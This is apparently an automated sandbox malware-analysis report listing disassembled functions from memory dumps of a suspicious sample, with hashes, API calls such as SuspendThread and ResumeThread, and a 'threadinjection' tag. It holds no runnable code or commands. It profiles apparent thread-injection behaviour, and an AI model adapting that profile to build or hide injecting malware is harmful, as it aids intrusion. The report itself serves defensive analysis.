                                                        • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                        • Instruction Fuzzy Hash: DD71903A204F8187E7769E26AE443EB7794F38EBC4F440026DD4A93B99DF35D6458B00
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 000001B0BB959E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766119561.000001B0BB950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B0BB950000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb950000_conhost.jbxd
                                                        Similarity
                                                        • API ID: CallTranslator
                                                        • String ID: MOC$RCC
                                                        • API String ID: 3163161869-2084237596
                                                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction ID: 78b47960dca2f246cd9751345394ebd916103ae52a7e666c2bd268e6589482a1
                                                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction Fuzzy Hash: 6061643AA04B848AEB32DF65D5803DE7BA0F369B88F144216EF4957B98DF38D595C700
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 000001B0BB982330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                        • Instruction ID: 3f9e1e52af2bd9f8d4555ba785bd5b1021212730053515fcb557909e64f47d4e
                                                        • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                        • Instruction Fuzzy Hash: B851B13A208F8183F676DA2AAA983EB7751F39E7C0F450125DE5A83B99DF39C5048750
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 000001B0BB9926F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastWrite
                                                        • String ID: U
                                                        • API String ID: 442123175-4171548499
                                                        • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                        • Instruction ID: 60d0abcdc26a4b7ccf8027c4d18f82d1d0bcc890e2baca30bedf8de8e799edd4
                                                        • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                        • Instruction Fuzzy Hash: 0E418F36615E8086EB629F25E9443EAB7A0F79CB94F504025EE8DC7798EF3CC441CB40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 000001B0BB9894A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFileHeaderRaise
                                                        • String ID: csm
                                                        • API String ID: 2573137834-1018135373
                                                        • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                        • Instruction ID: e47fdc159f18074cac7750adb93c462ee715b3c66656f1238279959ef9d42c69
                                                        • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                        • Instruction Fuzzy Hash: 97112B36214F8083EB628B25E94439A77E5F789B94F584224EECC87758DF3CC551CB00
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 000001B0BB957356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766119561.000001B0BB950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B0BB950000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb950000_conhost.jbxd
                                                        Similarity
                                                        • API ID: __std_exception_copy
                                                        • String ID: ierarchy Descriptor'$riptor at (
                                                        • API String ID: 592178966-758928094
                                                        • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                        • Instruction ID: 4fa64ed0352c4a96d86b9f695fb7fea17fd1ccd713bcc0cfd7084b169ce72cd3
                                                        • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                        • Instruction Fuzzy Hash: CDE08671650F4891DF178F21E9802D933A4DB6CB64B889122995C46311FF38D1E9C300
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 000001B0BB9573B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766119561.000001B0BB950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B0BB950000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb950000_conhost.jbxd
                                                        Similarity
                                                        • API ID: __std_exception_copy
                                                        • String ID: Locator'$riptor at (
                                                        • API String ID: 592178966-4215709766
                                                        • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                        • Instruction ID: 9466b7fd6b9877e20a8f56e68a44694e299580f3630cfe8bbc4b3c74deb6152d
                                                        • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                        • Instruction Fuzzy Hash: D4E08C71A51F4881DF278F21E9802D973A4EB6CB64B889122CA4C86322EF38D1E9C300
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 000001B0BB981BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID:
                                                        • API String ID: 756756679-0
                                                        • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                        • Instruction ID: 91fa03bcd9773199c22a075b4fdbf7564ef2da50c42fc2dec94d2d22c506b1cf
                                                        • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                        • Instruction Fuzzy Hash: BF114239601F5482EB65DF67A9042AA77A1F78DFC0F184029DE4D97765DF38C442C300
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 000001B0BB981268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1617791916-0
                                                        • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                        • Instruction ID: c3ec68c3203ee89e498dd9908a4f855afe18b7789e2847a7181934456c7c0b64
                                                        • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                        • Instruction Fuzzy Hash: 08E09239601A0487EB658F62D90838B3AE1FB8DF46F04C028C98947361DF7DC4D9C750
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Execution Graph

                                                        Execution Coverage:2.9%
                                                        Dynamic/Decrypted Code Coverage:75%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:12
                                                        Total number of Limit Nodes:0
                                                        execution_graph 13723 7ffd9bc50a93 13724 7ffd9bc50acb ResumeThread 13723->13724 13726 7ffd9bc50ba4 13724->13726 13715 7ffd9bc4f26d 13716 7ffd9bc4f27b SuspendThread 13715->13716 13718 7ffd9bc4f354 13716->13718 13719 7ffd9bc50bf9 13720 7ffd9bc50c07 FindCloseChangeNotification 13719->13720 13722 7ffd9bc50ce4 13720->13722 13727 7ffd9bc528d5 13728 7ffd9bc528ef GetFileAttributesW 13727->13728 13730 7ffd9bc529b5 13728->13730

                                                        Executed Functions

                                                        Function 00007FFD9BA90D7C Relevance: .3, Instructions: 293COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1753098550.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ffd9ba90000_hyperProviderSavesinto.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1c3b0f6e8d6a156aebad6b7b636b735f66db165967b14cc8c66301bab57e37b3
                                                        • Instruction ID: 125639abeec5725345f3908f05acb31954423512816af8e1d6a81d7cf139c47b
                                                        • Opcode Fuzzy Hash: 1c3b0f6e8d6a156aebad6b7b636b735f66db165967b14cc8c66301bab57e37b3
                                                        • Instruction Fuzzy Hash: 32A1A372A19A4D8FEBA8DBA8C8657AD7FE1FF59314F04027AD008D72D6CB742901CB40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FFD9BC50A93 Relevance: 1.7, APIs: 1, Instructions: 165threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1755047453.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ffd9bc40000_hyperProviderSavesinto.jbxd
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: 3662cbe442673abb4712def9a9435782bd5dbb5df7b04d192f47d8482169c59f
                                                        • Instruction ID: 7d8152d80dc15c36fa2647f4aed40686f1b7d512448df248fb66c39ee2c275a1
                                                        • Opcode Fuzzy Hash: 3662cbe442673abb4712def9a9435782bd5dbb5df7b04d192f47d8482169c59f
                                                        • Instruction Fuzzy Hash: F8518C70A0D78C8FDB55DFA8C855AEDBBF0EF16310F0441ABD049DB292DA74A846CB11
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FFD9BC50BF9 Relevance: 1.6, APIs: 1, Instructions: 148COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1755047453.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ffd9bc40000_hyperProviderSavesinto.jbxd
                                                        Similarity
                                                        • API ID: ChangeCloseFindNotification
                                                        • String ID:
                                                        • API String ID: 2591292051-0
                                                        • Opcode ID: 2f886601d1417f0e5d1e8aaea16c11cc800d50c15b7750e61c2fad01d478faac
                                                        • Instruction ID: c1ea0910dfa9ae01292a52ae9ffed498327435a2e387a2bbd167783d15e3e22c
                                                        • Opcode Fuzzy Hash: 2f886601d1417f0e5d1e8aaea16c11cc800d50c15b7750e61c2fad01d478faac
                                                        • Instruction Fuzzy Hash: EE416C70E0864C8FDB59DFA8C895BEDBBF0FF5A310F1441AAD049D7292DA74A885CB41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FFD9BC4F26D Relevance: 1.6, APIs: 1, Instructions: 140threadinjectionCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 21 7ffd9bc4f26d-7ffd9bc4f279 22 7ffd9bc4f284-7ffd9bc4f352 SuspendThread 21->22 23 7ffd9bc4f27b-7ffd9bc4f283 21->23 26 7ffd9bc4f354 22->26 27 7ffd9bc4f35a-7ffd9bc4f3a4 22->27 23->22 26->27
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1755047453.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ffd9bc40000_hyperProviderSavesinto.jbxd
                                                        Similarity
                                                        • API ID: SuspendThread
                                                        • String ID:
                                                        • API String ID: 3178671153-0
                                                        • Opcode ID: 23ceb2652d241249569d200b2c42b496d604fa85eaa77b0d0581e06db524704f
                                                        • Instruction ID: 4156a297e3447d4ff29dd53ccbedf7269753c6d97e88fb15eb97c3ec9cd586d1
                                                        • Opcode Fuzzy Hash: 23ceb2652d241249569d200b2c42b496d604fa85eaa77b0d0581e06db524704f
                                                        • Instruction Fuzzy Hash: 2F414870E0864C8FDB98DFA8D895AEDBBF0FF5A310F10416AD049E7292DA70A845CF41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FFD9BC528D5 Relevance: 1.6, APIs: 1, Instructions: 137COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 30 7ffd9bc528d5-7ffd9bc529b3 GetFileAttributesW 34 7ffd9bc529bb-7ffd9bc529f9 30->34 35 7ffd9bc529b5 30->35 35->34
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1755047453.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ffd9bc40000_hyperProviderSavesinto.jbxd
                                                        Similarity
                                                        • API ID: AttributesFile
                                                        • String ID:
                                                        • API String ID: 3188754299-0
                                                        • Opcode ID: 70317395efe4f00f2b75e57ac3bbffbf91882747edbb0582aa86345595cd5751
                                                        • Instruction ID: 658d99e365132b62eb30931dd3f01cfc9fabce384b1b242ec315100e9e4bc06f
                                                        • Opcode Fuzzy Hash: 70317395efe4f00f2b75e57ac3bbffbf91882747edbb0582aa86345595cd5751
                                                        • Instruction Fuzzy Hash: 1D41F970E0861C8FDB98DF98D895BEDBBF0FB69310F10416AD049E7252DA71A886CB41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FFD9BA9232E Relevance: 1.3, Strings: 1, Instructions: 69COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1753098550.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ffd9ba90000_hyperProviderSavesinto.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: w
                                                        • API String ID: 0-476252946
                                                        • Opcode ID: 0a35b77629fbe4e5865c7c212998d44c4f8b4cc4ee428ba97b77cae2cb506476
                                                        • Instruction ID: ebb83ff1053d28718e7c5a2ce18462cd6e93c2a4bae6e156b4d851c485281339
                                                        • Opcode Fuzzy Hash: 0a35b77629fbe4e5865c7c212998d44c4f8b4cc4ee428ba97b77cae2cb506476
                                                        • Instruction Fuzzy Hash: DA310C70A0A56ECEEBB0DB54C8547ECB3F0FB14341F5181FAD04DE62A1DA786A85AF41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FFD9BA94339 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1753098550.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ffd9ba90000_hyperProviderSavesinto.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $
                                                        • API String ID: 0-3993045852
                                                        • Opcode ID: 603ac81d82be8566eb6b9197545065167fbf88532b286bc1457800799fe9b75d
                                                        • Instruction ID: d2d38f3a78fd7fc1f195111289487be210e2516ae497560e267d3bb986990223
                                                        • Opcode Fuzzy Hash: 603ac81d82be8566eb6b9197545065167fbf88532b286bc1457800799fe9b75d
                                                        • Instruction Fuzzy Hash: 62113D30A0652A8BEB75DB58C8583E8B3B0FB58301F5041E9D10DA62A1CBB85B84DF45
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FFD9BA90908 Relevance: .1, Instructions: 133COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 143 7ffd9ba90908-7ffd9baa8934 145 7ffd9baa8936 143->145 146 7ffd9baa893b-7ffd9baa8941 143->146 145->146 147 7ffd9baa8a15-7ffd9baa8a1b 146->147 148 7ffd9baa8946-7ffd9baa897c 147->148 149 7ffd9baa8a21-7ffd9baa8a2a 147->149 151 7ffd9baa8982-7ffd9baa89ef 148->151 156 7ffd9baa8a0d-7ffd9baa8a12 151->156 157 7ffd9baa89f1-7ffd9baa89fa 151->157 156->147 157->156 158 7ffd9baa89fc-7ffd9baa8a0c 157->158
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1753098550.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ffd9ba90000_hyperProviderSavesinto.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a647fb2b6dbfabde9e2f149581ac7f510e47f7768b6d3194a2f120de617206bf
                                                        • Instruction ID: f1cf7c6b5bc2f5843325657e17a82d28bffa3f98c7ceb19e411caf00e2677d0f
                                                        • Opcode Fuzzy Hash: a647fb2b6dbfabde9e2f149581ac7f510e47f7768b6d3194a2f120de617206bf
                                                        • Instruction Fuzzy Hash: E4518E30A0490D9FCF84EF98D494EED7BF1FF58365B150169E419E7260DA74E990CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FFD9BA90998 Relevance: .1, Instructions: 111COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1753098550.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ffd9ba90000_hyperProviderSavesinto.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: faf0244bb2077aebd082eed1580c8cf6c76090892effa0387ae10fa86ed10a6d
                                                        • Instruction ID: 7068b307004dda9ee2dfa22e3970c719b8b6a0e7b05d784bd87a9e97c691b2dd
                                                        • Opcode Fuzzy Hash: faf0244bb2077aebd082eed1580c8cf6c76090892effa0387ae10fa86ed10a6d
                                                        • Instruction Fuzzy Hash: 7E410630E1490D9FDB98EF98C895AEDB7B1FF68305F140169E409E32A5CA74A941CB40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FFD9BA90C25 Relevance: .1, Instructions: 93COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 194 7ffd9ba90c25-7ffd9ba90c41 196 7ffd9ba90c7b-7ffd9ba90c8f 194->196 197 7ffd9ba90c43-7ffd9ba90c58 194->197 199 7ffd9ba90c96 call 7ffd9ba90960 196->199 200 7ffd9ba90c91 196->200 201 7ffd9ba90be8-7ffd9ba90c05 197->201 202 7ffd9ba90c5a-7ffd9ba90c77 197->202 204 7ffd9ba90c9b-7ffd9ba90ca8 199->204 200->199 201->194 202->196 209 7ffd9ba90cab-7ffd9ba90caf 204->209 211 7ffd9ba90ccc-7ffd9ba90d66 call 7ffd9ba90498 209->211 212 7ffd9ba90cb1-7ffd9ba90cc8 209->212 211->209 215 7ffd9ba90cca 212->215 215->215
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1753098550.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ffd9ba90000_hyperProviderSavesinto.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0a842ff4410c9291d28eb9d71bcc94ac9ea565aa153c9382a365b8bd8076360f
                                                        • Instruction ID: 1df0100237998fafd6339b4c3491276d066f9e5f38c0406a0c76a2c9201c825e
                                                        • Opcode Fuzzy Hash: 0a842ff4410c9291d28eb9d71bcc94ac9ea565aa153c9382a365b8bd8076360f
                                                        • Instruction Fuzzy Hash: 2C213B36B0E25E4AF732A7A89C211ED3720DF52765F054673D1689A1E3C9A8220A8759
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FFD9BA99998 Relevance: .1, Instructions: 90COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 220 7ffd9ba99998-7ffd9ba99aa6 225 7ffd9ba99ab1-7ffd9ba99b03 220->225 226 7ffd9ba99b0c-7ffd9ba99b3d call 7ffd9ba90780 225->226 229 7ffd9ba9996d-7ffd9ba99974 226->229 230 7ffd9ba99b43-7ffd9ba99b4d 226->230 231 7ffd9ba99976-7ffd9ba99990 229->231 232 7ffd9ba99994-7ffd9ba9999e 229->232 230->229 231->220 234 7ffd9ba999f8-7ffd9ba99a02 232->234 235 7ffd9ba999a0-7ffd9ba999b5 232->235 236 7ffd9ba99a09-7ffd9ba99a2d 234->236 237 7ffd9ba99a04 234->237 235->229 236->229 237->236
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1753098550.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ffd9ba90000_hyperProviderSavesinto.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 02b6cafdea001264dc4f5cae4407ac6a2c1ca6b9386bf85548c462afcee23982
                                                        • Instruction ID: eb0774a669b12d7eca50357311110106de346cf151a99d1aa99c2199855a8d79
                                                        • Opcode Fuzzy Hash: 02b6cafdea001264dc4f5cae4407ac6a2c1ca6b9386bf85548c462afcee23982
                                                        • Instruction Fuzzy Hash: 3C31AA30A0891DCFDFA8DB14C855AE9B3F0FB68315F1081EA904DE3265DE719A85CF80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FFD9BA91172 Relevance: .1, Instructions: 72COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1753098550.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ffd9ba90000_hyperProviderSavesinto.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c701a808d74f3cfe2000c58b6df61ba93b6236ff9353545bac8b799e6bd573c1
                                                        • Instruction ID: b393e79da7add56237894022cc08ea5137005f17f00aca5029f6ef8c5bcc9dc3
                                                        • Opcode Fuzzy Hash: c701a808d74f3cfe2000c58b6df61ba93b6236ff9353545bac8b799e6bd573c1
                                                        • Instruction Fuzzy Hash: 42213C30A1490E9FDB94EFA8C8A49ADB7F1FF28340B11057AD409D72A5DF74A941CB40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FFD9BA90C38 Relevance: .1, Instructions: 64COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1753098550.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ffd9ba90000_hyperProviderSavesinto.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bbae01ca8c9b24497b982a7cdfdea10a0d3f8d3e3fd4a65bbe93407284e39689
                                                        • Instruction ID: 8d999399296df56589e325432264ea534b8a3f30c374bd155c9f6242a02bf0d0
                                                        • Opcode Fuzzy Hash: bbae01ca8c9b24497b982a7cdfdea10a0d3f8d3e3fd4a65bbe93407284e39689
                                                        • Instruction Fuzzy Hash: B3112B32B0E25E4FF7329BA4C8201E97770EF42750F064573D054DB1E2D978260AC754
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FFD9BA90C40 Relevance: .1, Instructions: 58COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1753098550.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ffd9ba90000_hyperProviderSavesinto.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b23c1176e9d648bbbbab0b8c233bbab8ed981c1ae1f9c032554971dcb6c7e81d
                                                        • Instruction ID: 372a02387984f28fe87acbf17d84e923e4ce6a03abbb6c9748fd05d3d7e853fd
                                                        • Opcode Fuzzy Hash: b23c1176e9d648bbbbab0b8c233bbab8ed981c1ae1f9c032554971dcb6c7e81d
                                                        • Instruction Fuzzy Hash: 2211E932F0E69E8FF7229BA4C8201E97770EF52751F064573D064DB1E2CA782609D755
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FFD9BA90B7F Relevance: .1, Instructions: 57COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1753098550.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ffd9ba90000_hyperProviderSavesinto.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bf0ee676f075118abbcd2d56977f898033df8b78ac00b3fdde7b3462f49d1a9f
                                                        • Instruction ID: 522b3d866955fdcf05ba05bfc613df30db51b14656e891056ce999eb6ecc4fca
                                                        • Opcode Fuzzy Hash: bf0ee676f075118abbcd2d56977f898033df8b78ac00b3fdde7b3462f49d1a9f
                                                        • Instruction Fuzzy Hash: 18117C3162924DCFCB44EF6CC8919EA77A0FF58308F0102AAE84CD7251C730B565CB81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FFD9BA90C48 Relevance: .1, Instructions: 52COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1753098550.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ffd9ba90000_hyperProviderSavesinto.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9a2234ce25a44b511623a0fa62e1b505e646d83d5a641cdd3a58b8919a9b822b
                                                        • Instruction ID: 48173338e25a1f27fc863425756757f06bbaabf729558f1e637124febb549ad6
                                                        • Opcode Fuzzy Hash: 9a2234ce25a44b511623a0fa62e1b505e646d83d5a641cdd3a58b8919a9b822b
